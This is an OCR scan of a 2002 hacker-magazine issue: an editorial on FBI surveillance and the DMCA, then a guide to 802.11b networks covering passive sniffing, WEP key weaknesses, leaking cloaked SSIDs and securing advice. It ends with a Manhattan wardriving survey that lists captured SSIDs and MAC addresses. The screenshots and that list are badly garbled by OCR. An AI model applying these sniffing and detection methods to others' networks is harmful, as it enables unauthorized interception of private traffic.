2. "People who go to places of worship, people who go to li
braries, people who are in chat rooms, are going to have 'Big
Brother' listening in even though there's no evidence that they
are involved in anything illegal whatsoever." - Laura Murphy,
spokeswoman for the American Civil Liberties Union on the
new surveillance powers given to the FBI
Editor·ln·Chief
Emmanuel Goldstein
I.ayout and Design
ShapeShifter
Cover Concept and Photo
Dragorn, Porkchop
Cover Design
Mike Essl
Office Manager
Tampruf
Writers: Bernie S., Billsf, Eric Corley,
Dalai, John Drake, Paul Estev, Mr.
French, Javaman, Joe630, Kingpin,
Lucky225, Kevin Mitnick, mlc,
The Prophet, David Ruderman, Seraf,
Silent Switchman, Scott Skinner,
Mr. Upsetter
Webmaster: Dominick LaTrappe
Web Assistance: Juintz, Kerry
Network Operations: CSS
Broadcast Coordinators: Juintz,
Pete, daRonin, Digital Mercenary,
Monarch, w3rd, Gehenna
IRC Admins: Antipent, Autojack,
DaRonin, Digital Mercenary,
Porkchop, Roadie
Inspirational Music: Doe Maar,
Psychic TV, The Saints, Alice in
Chains, Yoko Ono, Chumbawamba
Shout Outs: rms, Hope Cordes,
Kyoske, Patrick, Christopher
Bollman, Mark Hosler, Uzi Nissan,
Rustu Recber
RIP: Jack Biello
2600(1SSN 0749-3851) is published
quarterly by 2600 Enterprises 11lc.
7 Strong :' Lalle, Setouket, NY 11733.
Second class postage permit paid at
Setauket, New York.
POSTMASTER:
Send address changes to
2600, P.O. Box 752, Middle Island,
NY 11953-0752.
Copyright (c) 2002
2600 Enterprises, Inc.
Yearly subscription: U.S. and Canada -
$18 individuaL
$50 corporate (U.S. funds).
Overseas - $26 individual,
$65 corporate.
Back issues available for 1984-200I at
$20 per year,
$25 per year overseas.
Individual issues available from 1988 on
at $5 each. $6.25 each overseas.
ADDRESS ALL SUBSCRIPTION
CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752,
Middle Island. NY 11953-0752
(subs@2600.com).
FOR LETTERS AND ARTICLE
SUBMLSSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle
Island, NY 11953-0099
(letters@2600.com, articles@2600.com).
2600 Office Line: 631-751·2600
2600 FAX Line: 631- 474·2677
4. We've reached a critical stage on so many
different fronts that it's hard to i magine they're
not all somehow intertwined. We shouldn't
douht our ahil ity to influence change in what
ever forum the hattie we choose is being waged.
This is the time to speak up.
Recent changes in the way our government
works seem to no longer be about terrorism - i f
they ever were in the first place. A s freedoms
disappear and power becomes more centralized,
a greater numher of people are beginning to re
alize that we're moving into some very danger
ous ground.
The "reorganization" of the FBI on May 29
was enough to shock a lot of us into paying at
tention. Now, all of a sudden, we no longer have
an agency whose sole purpose is to investigate
crimes. Their new reason for being is to prevent
the crimes in the first place. Splendid, you might
say. Anything that helps to stop crime has got to
be a good thing, right? This is precisely what
you're supposed to say. However, if you take an
extra few minutes and think it through, you may
come to the conclusion that this solution may in
deed be a worse crime itself.
Let's louk at what we're now faci ng. For the
moment we'll confine it to the online world and
the hacker culture. The FBI now no longer has
to have any evidence of a crime being commit
ted or even planned. They can wander onto IRC
or an AOL chatroom and simply capture every
thing and then, at their leisure, look for things
they don't like. The users responsible will then
face a full i nvestigation - all on the basis of
words spoken in a public forum. The potential
for targeting of certain individuals or even
groups for prosecution is now in the stratos
phere. People attending 2600 meetings will be
subject to the same kind of scrutiny. Agents may
now attempt to infiltrate organizations even
when there is no sign of any criminal activity -
just to keep an eye on things. If this doesn't
make alarm bells go off in your head, there's
probably not much we can say to make you see
the distinct threat we're now all facing.
How much does this really have to do with
hackers? Isn't this all about capturing terrorists
and stopping really bad people from doing really
bad things? That's what it was supposed to be.
But clearly these goals have been subverted. Ac
cording to a Fox News report on May 30, 2002:
Page 4
"The FBI's top new marching orders will focus
on terrorists, spies, and hackers, i n that order."
Granted, this is Fox News and they're liable to
interpret anything from credit card fraud to on
line pornography as a derivation of computer
hacking. The feds themselves refer to their new
focus as "counterterrorism, counterintelligence,
and cyber investigations." But the latter cate
gory in particular is so nebulous that literally
anythi ng that someone involved in computers
might be doing would be open to scrutiny. And
therein comes the proverbial chilling effect.
Not convinced yet? The FBI nuw can check
various commercial databases and see what
videos you've been renting, what books or mag
azines you're reading, what's popping up on
your credit card bills, where you're traveling to,
etc. Even your medical records won't be safe
from their prying eyes. And all without any evi
dence that you've done anything wrong ! In fact,
approval from FBI headquarters is no longer
even needed. Your local field office can do this
on their own if they feel like it. And those who
doubt that federal agents would abuse the power
they hold need only look back at the Bernie S.
case of the mid 90's.
In other countries government agents rou
tinely infiltrate law-abiding groups of people
who disagree with government policy. They
then succeed in disrupting and dividing the
group, at times even pushing them into i ll egal
situations that never would have happened oth
erwise. And that gives the authorities carte
blanche to move in. (In the United States we saw
this occur decades ago with the FBI's counterin
tell igence program - dubbed COINTELPRO. In
nocent people i nvolved in the civil rights,
antiwar, and countercultural movements were
spied upon and harassed by these agents until
such conduct was outlawed in the 70's.) Now
this KGB style of dealing with dissidents, mis
fits, and individual thinkers has come back
home wrapped in a flag. We can only wonder
how many innocent people will be caught up in
its wake.
It's an awfully odd coincidence that word of
the FBI's apparent bungling of an investigation
that might have detected the September II plot
came literally days before the largest such reor
ganization in our nation's history. That story
managed to convince a number of people that
2600 Magazine
5. change was needed. But the subsequent events
managed to also slap a few faces out of their
deep sleep of apathy and blind acceptance.
The fear now of course is that any resistance
will be too little too late. But it doesn't have to
be that way.
When we were sued two years ago by the
motion picture industry, it caught a lot of us by
surprise. The Digital Millennium Copyright Act
was already law. What chance did we have to
fight its existence'? Was it not also too little too
late'?
We don't think it was. Nor do the thousands
of people who supported us through the entire
ordeal. And as we look around today, we realize
that we have become so much stronger and more
unified as a result of the action taken against us.
We lost the case. And we lost the appeal. And,
after considerable consultation, soul searching,
and debate, we believe it's time to change the fo
cus of this fight.
We wanted to take this all the way to the
Supreme Court. But, as legal experts who know
considerably more about the system than we do
emphasized, there was an infinitesi mal chance
that they would even agree to hear the case and
even less of a likelihood that we would win if
they did. Both rejections ran the risk of setting
the clock back as far as legal precedent went and
this, quite frankly, is not the time to lose even
more ground.
But, painful as this decision was to reach,
we've come out of it learning something impor
tant. We've won. Maybe we weren't victorious in
court but that doesn't exactly tell the whole
story. Look around you. People have become
aware of the evils of the DMCA. When this first
started years ago, so few people knew anything
about it - that's how it became law in the first
place. But now it seems to be on everyone's
m inds as it becomes every bit as pervasive as we
knew it would.
The industries that embrace the DMCA have
fallen i nto disrepute with the general public as
their true motives of sheer greed become more
and more obvious. Thc recent attempt to charge
fees for Internet broadcasting in the name of the
DMCA outraged a whole new crowd of people.
The efforts by the recording and motion picture
industries to control and eventually bury any as
pect of fair use by consumers has backfired hor
ribly. People are realizing that such new (and
mandatory) innovations as digital television will
give them less freedom and flexibility if they
don't challenge these laws. Attempts to control
copying of CDs have ranged from the absurd to
the criminal. It was recently discovered that
simply using a magic marker to write over a cer-
Summer 2002
tain section of a "copy-protected" CD was
enough to defeat the entire system leading many
to wonder if magic markers were now illegal ac
cess devices under the DMCA. And Macintosh
users were horrified to discover that inserting
one of these CDs into their machines would of
ten cause actual damage to the machine ! In fact,
Philips, the company that invented the CD, says
that these things don't even meet the definition
of a CD and should not be sold as such. We en
courage people who find these products in the
CD section of a store to separate them to avoid
confusion and false advertising, not to mention
possible costly repairs for people who unknow
ingly try to play these things in their computers.
We'd like to say that our early battle with the
DMCA was what started to wake people up. But
it wouldn't be fair to those people who really did
that job - the MPAA, the RIAA, and all of the
other corporate and government colluders who
joined forces to establish a stranglehold on the
technology and dupe the public. Once their true
colors became known, it was a foregone conclu
sion that they would begin to self-destruct in an
expanding cloud of greed.
With the ominous changes in federal agen
cies, we are looked upon by many as little better
than terrorists. Warped though that perception
may be, we have to face the fact that this will
overshadow the actual merits of our case. After
all, when the MPAA started this whole thing,
they chose us as the people they wanted to sue
even though there were hundreds of others they
could have gone after. Their reasoning was that
as hackers, we would be summarily dismissed in
the courts. Unfortunately, that proved to be true.
But they most certainly didn't count on the mas
sive rallying of support that came our way. It
took courage and it took intelligence for individ
uals to stand up against what they knew was
wrong. And now, unlike in 2000, the DMCA is
being challenged on many fronts, not just ours.
So, while the stage may be shifting, the fight
will intensify and see many more participants.
We will not shy away from any of this nor lose
sight of the ultimate objective, which is to repeal
this horrible law once and for all and restore the
right of fair use and free speech to the public.
It just got a lot harder with all the domestic
spying, branding of hackers as terrorists, etc.
But intensified pressure often in turn makes a
battle all the more intense. While more seems to
be at stake than ever before, we've never felt so
far from defeat as we do now.
Page S
6. The ComprehenSive GUide to
8 ..... 2 _ __ __ I:»
Wireless NetM'orks
by Dragorn
Wireless networking has been around for
decades (fixed microwave l inks, laser links, ham
packet radio), but Wireless Ethernet, aka WiFi
(short for "wireless fidelity"), aka 802. 1 1 b has re
cently exploded in popularity for home and of
fice use. As is too often the ease with any new,
widely adopted technology, the average con
sumer has little understanding of the impaet of
the l ittle box with antennas that they just hooked
up to their cable modem or that their omce man
ager just told them to install on the network.
8()2.11b Background and Basics
802. 1 1 b is part of the 802. 1 1 wireless family
(which includes 802. l l a and 802. l l g, however
neither are as widely used as 802. 1 1 b). Operating
in the 2.4ghz unlicensed radio band, 802. 1 1 b is
designed to offer up to IImbit (closer to 6mbit
usable) over short distances (typically less than
1 500 feet) but with custom antennas and a clear
line of sight, links of several miles are possible.
Because it operates in the unlicensed band, no
single corporation controls the airwaves. But un
fortunately, this means there is also a lot of
garbage floating in the 2.4ghz range of the spec
trum along with the wireless data. Many cordless
phones operate in the same frequency and house
hold microwaves leak significant noise into the
2.4ghz range. Some wireless camera equipment
(X IO) uses the 2.4ghz range as well. WLANs
also recently faced the threat of severely re
stricted transmission power due to a petition by
Sirius satellite radio, however the complaint was
recently withdrawn by the company.
802. 1 1 b operates in two modes - infrastruc
ture, where dedicated access points (APs) act as
the central points for a large number of clients
and ad-hoc, where each client talks directly to
other clients. In infrastructure mode, each client
needs only to be able to see the AP (or another
AP in the same distribution system) - two clients
need not see each other directly because the AP
will relay traffic. In ad-hoc, every client must be
in range of every other client. In either opera
tional mode, it is, by definition. a shared media
network - everyone can see all the tramc in the
air or, at least, all the traffic in the air that they are
in range of.
Page 6
Each 802. 1 1 b network is given a Service Set
Identifier, or SSID. This is the name of the net
work, which all clients use to identify which net
work they are communicating with. Networks
operate on one of 1 2 (in the US) or 1 4 (interna
tional) channels. Most wireless setups will auto
matically select the best signal out of all the
network points sharing the same SSID.
802. 1 1 b has l ink-layer encryption called
Wired Equivalence Protection, or WEP. WEP
uses RC4 in 40,64, 1 28, or on some recent cards,
256 bit encryption. While never designed to pro
vide a tremendous amount of security (wired
equivalence i mplying "as secure as a shared me
dia wired network," which. as anyone running a
sniffer on a wired shared media network can tel l
you, isn't very secure), additional flaws have
been found in WEP which allow key attacks
against data encrypted by many manufacturers.
More on this later.
Aid:fa9<ll':l@grJsll_""""_"".....t"""""allWgon>
I-Ndworkc;--(Alltol'itl
I N"mf> T WCh Data Weilk
I kogo A Y 11 3 0
I Sp".,dStr-enn AN 11 0 0
I SYSf[M ( Y 06 0 0
I fl"kflt A Y 01 273 0
I Air-P"J-LNet..",k nOdd7 AN 01 2 0
I ! fJ"k"t A Y 06 ? 0
I ! Pau14A A Y 06 1 0
I I Jrt4(i9;>..1l A Y On 0 0
I I TcholakLu" A Y 06 129 0
I Airport B,.,s<, B461 (loy h' AN 01 A? 68
I hshe, A Y 01 0
I KCANetwork (j N 01 1
I Ajrport BA'lI' Ull1 nflshi AN 01 (3 10
I IdlOldkicH1 PN - 0
I 1I0lle A Y 07 0
L-[at 'l0.7!,O (on -/3.994 Flit ::l?3f Spd FixNON[
I ·St<ltus-- 1
I Found new network '·l1om"·· bssid 00:50:18:0/:/4:9A WEP Y eh J @ 11.00 mba I
I found ,......w network ··)cho)"k;",,·· bS'lid 00:30:fi5:1B:B1:5C W[PNCh 0 @ 0.00 mLl I
I Found IP rang" for ··(lirport Base C811 n"shion)" V)" AR!' 143.::'5..179.0 I
I �ound nCId "f'tldork '·Airport B<I'l<' [811 (F,,�hinn)·· b""id 00:0?:?1l:lF: 6IL61 HEP I
L·Bfttt<'ry: 1JIOh:l9mO�-- ____ .. - ______.._. I
...-----�------ ---�--
802.11b Packet Types
The most common types of 802. 1 1b packets are:
1. Beacon packets. Typically, access points
continually transmit beacon packets containing
their SSID, maximum transfer rate, and MAC
address of the access point. Most APs send be
tween six and tcn beacon packets a second con
tinually.
2. Prohe packets. When a client tries to join a
network it sends a probe request packet contain
ing the SSID of the network it wishes to join. If
an access point allows the client to associate with
the network, it responds with a probe response,
also containing the SSID.
3. Data packets. Typically, these are just
2600 Magazine
7. TCP/IP encapsulated in the S02. 1 1 frames.
4. Ad-hoc packets. These are no different than
data packets except they are sent card to card in
stead of through an access point.
Detecting 802.I1b Networks
There are two primary methods for detecting
wireless networks, utilized by different pro
grams.
I. Active detection, where the client transmits
probe requests and looks for networks that re
spond to them.
Positive: Sometimes able to detect cloaked
networks, does not require a card or driver capa
ble of RF Monitor support.
Nef!,alive: Requires the client to be within
transmit range of the access point for it to be de
tected, generates traffic on the target network
which can be traced, and lies on questionable le
gal ground so far as actively joining a network is
concerned.
Used hy: NetStumbler (www.netstumbler.
com, Windows).
2. Passive detection, where the client listens
to all wireless traffic in the air and extracts infor
mation from the packets found.
Positive: Client needs only to be within re
ceive range to detect a network, no traffic is gen
erated which can be observed. Passive sniffers
are also capable of recording data packets for ad
ditional dissection.
Nef!,ative: Requires a card and driver capable
of RF Monitor support, which enables raw
packet detection. Cannot detect a non-beaconing
network with no data traffic.
Used hy: Kismet (www.kismetwireless.net.
Linux/BSD), Wellenreiter (www.remote-ex
ploit.org, Linux), Airsnort (airsnort.shmoo.com,
Linux), and others.
Using passive sniffing it is essentially impos
sible to detect someone monitoring your net
work. No traffic is generated by the sniffer and,
even in "seeure" environments, a handheld such
as the Ipaq or Zaurus are more than capable of
capturing traffic and can easily be kept in a jacket
pocket or bag.
,y�@!Jlr.I"'''''''''' '''./i<!t'��
,-Networks (FJrstc;"",n)
I Nome T WCh Pm.kb rl"�,, Ddt" He"k
I tmobJle AN 01 81') 0 0
I INetwork Jl".td�lq--
I I N",",,,, : www.ny<-w1rel,,,j::;.nel
I I �srlJ . .......nyn.1lrcl(><''l.llct
I I Mallu f : HdVf' I At)
I 1 8S5m : OO: 02. 2D,?1:rB:G C
I 1 M""Rcot.,- 11.0
I I . S.,tJun 8
I I 1 "te:'>t . SatJun H
I I T ype : A "u'c;t,Poin
1.1 Channel: 11
I I WH' . No
I I Bedcon : 100 (0.102400 �ed
I I Pack..t:::; :;>O
I I Data : 0
I Lal LLC 20
,-Sfl Cr!JpL 0
I fol Weak : 0
I fol IP Iupe : None dcterled
I Fol
I SOTtJngL>ytlme flr";t det..,t..d
�!eqJ:
���_��:_��������____�___��__
Summer 2002
Passive monitoring of wireless data opens
many advantages for tracking and analyzing net
works. The level of monitoring possible varies
depending on the type of card used. Cisco cards
usc a vcry fast hardware channel hopping
method, which allows them to scan all of the
channels transparently. Prism2 cards must do
channel hopping to detect all the 802.1 1 b chan
nels, spending a small amount of time on each
channel - most wireless sniffers include this ca
pability either internally or as a helper applica
tion (Kismet uses "prism2_hopper" to hop three
channels per second).
The most simplistic information is in the
802. 1 1 b headers - the MAC of the source, desti
nation, and access point systems, the direction of
communication, the channel. SSID, WEP, and
supported transfer rates. Cisco access points
even include an extra status field that often con
tains information about the function of the equip
ment, and sometimes even the location of the
wireless access point.
Far more information can he gathered by dis
secting the data packets of unencrypted networks
- FTP, telnet, HTTP, POP, and IMAP traffic are
all as vulnerable to observation as they would be
in an unswitched ethernet network. ARP, UDP,
and especially DHCP can be used to detect the IP
ranges used by the network.
Basic sniffing can be done with almost any
wireless card, but some are better than others.
Most consumer wireless cards are underpow
ered, only capable of detecting strong signals,
and don't support external antennas. Orinoco
cards are more powerful than most, and support
antennas, however it is not always possible to do
full RFMon mode, which is required for passive
monitoring (there are patches to the Linux
Orinoco drivers but they only work on some
firmware versions). While not perfect, one of the
best cards for general sniffing is the Cisco AIR
LMC3S0 which has dual antenna jacks, 1 00mW
transmit, and -<)SdBM sensitivity (compared to
20-30mW transmit for most prism2 cards and
-80dBM sensitivity). As mentioned before, the
Cisco chipset uses a very fast internal channel
hopping scheme, which can sometimes result in
missed packets if a single channel is saturated,
but overall the performance of the card is excel
lent. It can be obtained through online retailers
for approximately $ 1 1 0 US.
Equally important is a proper antenna - re
member that a car is just a big metal box, and
metal boxes are not good for radio signals. A car
mounted antenna, while not absolutely neces
sary, will often triple the amount of data
received. Sdb gain magnetic-mount antennas can
usually be found for $60 US.
Page 7
8. The Myth (and truth) ofWEP, ssm
Cloaking, and Non-Beaconing
WEP is alternately touted as the only protec
tion you'll ever need, and so weak it's not worth
enabling. The truth lies, as always, somewhere in
the middle - all, or nearly all, modern chipsets in
clude workarounds for the flaws in WEP key
generation, however all it takes is a single older
system on your network (access point ur client)
to expose the key.
Nf'lworkc, -(flulor,t)
N".e r W(I> Packbring" Ont.. H.."k
I rtB StLlLi'1tl,<j
fHl Stmt -S",t Jun 301,0;'>:1'-,;'>00;>
("I N"lw()rk,,:?02
hi [ncr·�pteJ; 61
del Ikfm,lt 3;>
101 M"x. Pdck".1 R..u,·
/,,1 th,mr,..l thaw'·
hoi
1101
01'
pArkpl,,/"''',.
01
03-
31 , 02:
0 , 04-
0
3
,,' O�. 4 , OG. yy
pcd
del
Oe'
.101
SL"tu<, I 1? 3 4 � 6 7 8 '-l 1 1 1 1 1
I Fo,"m] I 012 31
I � ound I
I r"lnd
I Si1Vln!(Jdld ril,,·,.
I Bntteru" flC,-hilrginf(h'10h2Bml:",
----�----�-------�-.----
01
09-
11
1:1:
2 , 08: 1
4 , lO- S
3/ , 1;>·
0 , 14:
WEP only encrypts data packets - link layer
packets such as joining, beaconing. probes. etc.
are left unencrypted. Actually cracking the WEP
key depends on the key length, the number of
flawed systems generating traffic, and the traffic
levels on the network - if there are no systems
generating data traffic, you will never have the
opportunity to capture weak keys. The most im
portant factor is time - typically only one or two
in thousands of packets contains a weak key, and
current key attacks require thousands of weak
keys to extract the full key.
Various dictionary-based brute force attacks
are under development, but will of course have
the same weakness of any brute force attack - be
yond the expected range of likely keys it be
comes time consuming number crunching.
WEP has the additional flaw of being a
shared private-key encryption method. Once
your key is cracked (or otherwise compromised
by system being cracked, i nsecure means of giv
ing the key to personnel or other network users,
an employee leaving, or even an employee losing
a wireless-enabled handheld), all systems must
be updated with a new WEP key, which has the
same weaknesses and vulnerabilities as the pre
vious one.
Coupled with additional security (as dis
cussed later), WEP can be a useful deterrent,
however it is by no means sufficient as the only
line of defense - while it may foi l the casual snif
fer, a determi ned attacker with the rights tools
stands a good chance of breaching your network.
In a further attempt to make consumer hard
ware more secure, or to at least appear more se
cure, many manufacturers include SSID
Page 8
"cloaking," where the SSID is blanked from the
beacon packets. Unless a client knows the cor
rect SSID, it cannot join the network. Unfortu
nately, this "protection" is completely
transparent - once a client joins the network. the
SSID is sent by the client and the AP in cleartext
(even if WEP is enabled - remember, WEP only
encrypts data packets, not link packets). Kismet
automatically detects this exchange and fills in
the network SSID. If you have users on your net-
work, your SSID will bc cxposed.
Several physical attacks (of varying legality)
are possible to force a cloaked network to dis
close the SSID - when a card gets a weak signal
or loses the signal, it attempts to rejoin the net
work, disclosing the ssm. Any 2.4ghz RF inter
ference strong enough to disrupt the network and
cause systems to rejoin will, in addition to being
against all FCC regulations, happily calise a dis
closure of the SSID.
The second common trick favored by manu
facturers to try to protect AP's is to disable bea
coning entirely. While not completely in
accordance with the S02. 1 1 b specifications, this
doesn't cause major problems for normal opera
tion. However this, like ssm cloaking, cloes not
provide any significant protection. Any data trav
eling over the network can still be seen, and the
SSID is disclosed in the same fashion as the
cloakecl SSI D by users joining the network.
��""""""""-L,,u...I:mOllU!/lImgDm
,-Net",orks- (Autofit)--
N«mf> I WCh Pa<.kt·, fldg,.; I)"L" We"k
<no ""id> fl Y 11 30 ij 0
nOdtdStrlng..,Oump
I IIiEPfrLlEllrClP!rrflCl'lCflCflU1C(I((lBM
I 1-(iI-NFH�PlJfl[)JIlJI)An![)JlllrflCflU1CAUl
I [GI-NI-IIU1CACAU)(AlACnCflCACACnrAflN
I HflILSLOT BROl�S[
I fM(,_O�I'lOWI8
I fil'lttth"rn..tO!??
II [beo l"Le,n"twOlk Ope'dtl,,!: S)"I". Sorll.wr,
I [oS (1m) C2900Xl Soft",,,,,, (C?�OOXI-L3H2S-M) . Ver'>lon 1;>.0(5):<1J. III
I Lopyr 1I;:h1. 1<-) 198b 2000 hJ '-�sc" S!jst"m.-,.
I Compl Lcd Mon 03 flp, 00 16;31 by ""'flU
I
I (',<;corlS-C?9?4-XI
I [GfNfllfPDAUJ[lJDJDJCACACACACnCACA
I fGENEHCACACACACf((lCACnCflCA(ACABN
lLar MAlLSIO(BROWSI-
I $tl fMli09999 I
I fol If'CcP I
I11-01 °k",/". I
I Sd l I
I found new rwtwork "<no <;';1<1)" b,,"'Hl OO;40-'lb:31 ,'l?-13 WII' N (h 9 � <,_00 ..bl1 I
��_:�����?_O!128�1��_
-:__:-__:-_______' J
Securing Wireless Networks
After all of the above doom and gloom, how
does one secure a wireless network? There are
two primary methods that can be used, and are
most effective when used in conjunction:
1. Application or network-layer encryption.
This can be as simple as SSH (or an SSH-tun
ne1ed PPP virtual network) or as complex as
IPSEC.
2. Proper authentication. MAC addresses can
be easily spoofed. Some APs offer enhanced lo
gin authentication (Cisco LEAP). For APs that
don't (most consumer equipment), solutions like
NoCat (www.nocat.net) can provide secure au
thentication methods to protect the rest of your
network from the wireless segment.
2600 Magazine
9. 3. Properly tuned equipment. Don't assume
stronger is better! Always use the minimum
power possible for your network and select your
antennas appropriately. Not only is it good for se
curity, this will help reduce the congestion in the
2.4ghz band.
�� 0.<1.
r
-
Networks
--CFirst Seen)--- ------------------ -------, r-1nfo---,
I Nalle T W Ch Packts FlailS Data Weak II I,
;,1 hobile A N 01 815 0 0 II Ntwrks I
-I I-Packet Rale-- ------------------------------ ------------------
,82 I
,I I Pkts Its I
'
I I 611 X 1861
'
I I I X X ltdI
"
I I I X X XXX 1451
� I I I X X II XXXXXX X Iak I'
'I I I X X XXXKXXXXXXXX XXXX X I 0 I
1 I I XXXXXXXXXXXXXXXXXXX XXXX X Ise I
� I I 301 X XXXXXXXXXXXXXXXXXXXXXXXXXXXX 106I
_"1.1 I X X XXXXXXXXXXIIXXXXXlIXXXXXXXXXXXXXXX Irdl
-I I I XX X XXX)(XXXlIXXXXXX)(XXlIXXXXXXXXXXKXX)(X 1251
� I I I XXXX XX X XX XxXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 115 I
'I I I XXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 128 1
1 I I XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX lsdI
'LLBI IXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 118-J
:rStl 0 ------------------------------------------------------------ 1---,
·:1 Fol -5 -2.5 0 It I
1 Fol The (Minutes) I I
'I FoL---------------------------------------------------__________________J I
I FOlIndnew network "<no ssid)" bssid OO:<l0 :96:<l5:21 :BCW[P N Ch 6@ 1.00 .bit 1
L
Batte�y: ACc harging <II Oh28.15s---------------------------------------------J
Community Wireless Networks
Wireless networks provide a phenomenal
level of networking possibilities. Most urban ar
eas have at least one wireless users' group aimed
at building a free, community wireless network.
Often called a wireless mesh or a parasitic grid,
community networks aim at blanketing a city (or
parts of a city) with free broadband access.
Groups such as NYCWireless (www.nycwire
less.net, New York City, NY), BAWIA
(www.bawia.net. Boston. MA) and Personal
Telco (www.personaltelco.net) have already
made significant i nroads into providing wireless
public networks.
���;.� 00.
r-Hetworks- - (Autofit) ----------------------------------- 1r-1nfo---l
I Na.e T H Ch Packts Flags Data Heak I I I
,I linksys A Y OS 95 0 0 IINtwrks I
I default A Y OS 1300 90 0 II 183 1
I tsunalli A Y OS 3'10 0 0 II Pckets I
I I lton123 A Y 07 1119 1 II 28720 I
I linksys AN OS 1442VU3 81 II Cryptd t
I I-SortNetwork------- --.------.-----.-------- -----------145 I
I I Key Sort Key Sort lak I
I I Auto-fit (standard) Channel I 0 I
'I I FIrst tille seen first tille seen (descending) Ise I
.'1 I ll3test tille seen Ll3test tille seen (descending) 130 I
'I I 8SSID 8SSID (descending) Ird t
I I SSID ssm (descending) 149 I
_I I PBcketcount PBcket count (descending) lIs I
I I HEP Cancel 1 5 1
I L -------------------------- �-----.•---------- -.-- -- ---- -- __J sd I
L-lat 40.749 Lon -73.988 Alt 218.Sf Spd O.OOOll/h Fix 3D ---- ________J L002419-J
r-Status-------------
:1 Autofitting network displBY
I Found new network "SternO nTheMove" bssid 00:OS:25:5E:OA:95 WEPN Ch S @ 11.0
'·1 Found new network "linksys" bssid 00:06:25:50:40:5f HlPNCh 6(111.001lbtt
I Found IP rBnge for "target2" via UOP 206.25.87.0
�
_-::.��
>
�����
_
�£
.
���.!:.
g��
c
g
_
4
,
1 Oh281115s--------------
Community wireless networks offer an alter
native to "big business" broadband and can often
get broadband to areas unreachable by conven
tional means, and can provide a completely inde
pendent means of transport for free information
without relying on any corporate services or re
sources. After September 1 1 , the NYCWireless
group was i nvolved in bringing back connectiv
ity to areas left without l inks that the large
providers had not been able to restore.
While uncommon, sometimes companies
Summer 2002
(knowingly) share their wireless networks. Aka
mai in Boston allows public use of their wireless
network equipment, which covers most of Cam
bridge, with minimal filtering of outgoing traffic
(SSH and HTIP both work fine).
In most cases, donating a node to a commu
nity network is as simple as putting an access
point on a broadband connection (cable, DSL, or
other) with a public ssm and registering it with
the group of your choice. The web site for a wire
less group in your area should contain all the in
formation you need to join.
Threats to 802.11b
802. 1 1 b in general and community networks
specifically face several hurdles in the near fu
ture. Broadband companies are beginning to
crack down on the sharing of access and on users
who util ize the ful l bandwidth allocated to them.
Connection sharing is already against the accept
able use agreements of most broadband
providers, and not far away for most others, and
should providers begin charging per megabyte
over an arbitrary quota (as Time WarnerlRoad
Runner is considering), free public broadband
could quickly become a thing of the past.
Also, in many urban areas (and even less ur
ban areas) the airspace available for wireless net
works is becoming saturated. Just like collisions
in shared-media ethernet, as more wireless net
works with overlapping signals are in an area,
less bandwidth is available for each. Non-
802. 1 1 b devices like phones, microwaves, cam
eras, and even a planned microwave-based
lighting system all leak noise into the air that fur
ther degrades 802. 1 1 b signals.
Finally, while the current 802.1 1 b equipment
is well understood and supported with open
source drivers, manufacturers are aggressively
discouraging community-developed drivers for
802. 1 1 a hardware, and in fact as of the time of
this writing it is completely unsupported i n
Linux.
Practical Examples
To gather the data for the cover we used a
Cisco card, magmount antenna on the roof, a
Garmin GPS, and Kismet. I n an hour and a half,
we found 448 networks. In the center of Manhat
tan, an area which arguably should be more secu
rity aware than anywhere else, only 26 percent of
the networks had encryption enabled. At least 75
of the access points were factory configurations,
with all the default access granted.
Plaintext data i ncluded searches on
outpost.com, an individual with 1 29 email mes
sages (every single one of them porn spam),
books purchased at Barnes and Noble, IRC ses
sions, instant messenger conversations, browsing
at the Fry's website, Windows Network Neigh-
Page 9
10. borhood file transfers, data from globix.net, uPNP
services looking for drivers, and more.
Vulnerable networks ranged from personal sys
tems in apartments, law firms, book stores, and news
companies. At the very least they exposed all of the
data handled by the company, and at the worst pre
sented an easy entrance into the corporate network.
Wireless demo units are often plugged in behind the
corporate firewalls of retail stores (Office Depot for
months ran a default Linksys demo unit plugged into
the corporate network behind the firewall).
Huoks Ilrnrl'sscd at narn�s and ?Iohlcs
during the .Julie 7 26011 mcding:
Page 10
iunallli,OI):-1():l)():_�-1::2:..{·
S�I.()():6():II):n:YJ!:J'7
linby" OO:O-I:'iA:2EJO:III
link,y..., ()():O..j.:5A:2J':I'.�:I;1
CC:,:lI-Budlle!, O(J,{lh:2:"n():�A:.'ifl
Ikakl', (lO:511:!)A:t)l7C:t'-
1'l"1'i �_ OIl:60:ID:IF.:6lJ:F7
CO!Hlcct.ll2.00:-iO:%:-IlJ:II:l)(
rimpr, ()O;()4:5!::'6-l'li'UlI:l
<no ,,,d>. O(l:40:9fi:4] ,('5:55
111l�'y, OO:04:)..,I)E:IlJ:70
lCIIIlI,()O:II-I:7(J:A'i:Cl:I!1
<no �sid>. ()O:�O:l)6:2lJ:W:-Il)
iIlILT<ll'I.OO:IlI.24:HI:II!:6L
WLl, O():l)O:DI:111:213:21;
<lIP ,id--,_ (IO:I',I)'()l:,'i():AI);')(j
SYSTIJ·....1. 00:04:."i.:1)1)·1·:HI
ILilat. ()():O+:7.�:(11:-+7:1)1)
irPnrt "ct"nr� 22had7.OO:W.ID:.:'::'.IL:D7
ddault.(HJ:lJO:-II:()H:·L· 1·1
tlalat.I)Il:0")':75·()1:7()·(lA
P,wl·tA.OO:.;o·ll."i:I]}·II}S
Ichol:Jkian.I)II·:m:hS·14:R6:(].
WI�AN.00:,0:1;1:2(>:1;1):93
WI AN.OOJIJ.FI:Ill:IE2F
WI,..-N. OO:OI.2-1:FO.77:7B
h;ly(J.OO:40:()(d4:HY.19
<no "ilL>. OOAO:Y6..nJO:25
<no "ill>. (H1AO:')(di:SB.II
hUllallli.llOAO:',)6:4I:J':lJO
C(lII1I1I (.00:5tJ:IH.()1l:6H:CO
Lioll121 (JO:O":."iA:OI�j9:lJ�
lin�ys. (JlJ:06:::'."i:60:XC·:I.lD
linb},.IIII:()")·S":OI·,:X":tn
hudsol1.00:0.'i·.'iI):DA·10:1'.I;
linb},.OO:O(r2."i:Y':IJI):(lH
101.()O:III:IJl7(·:02:..J.H
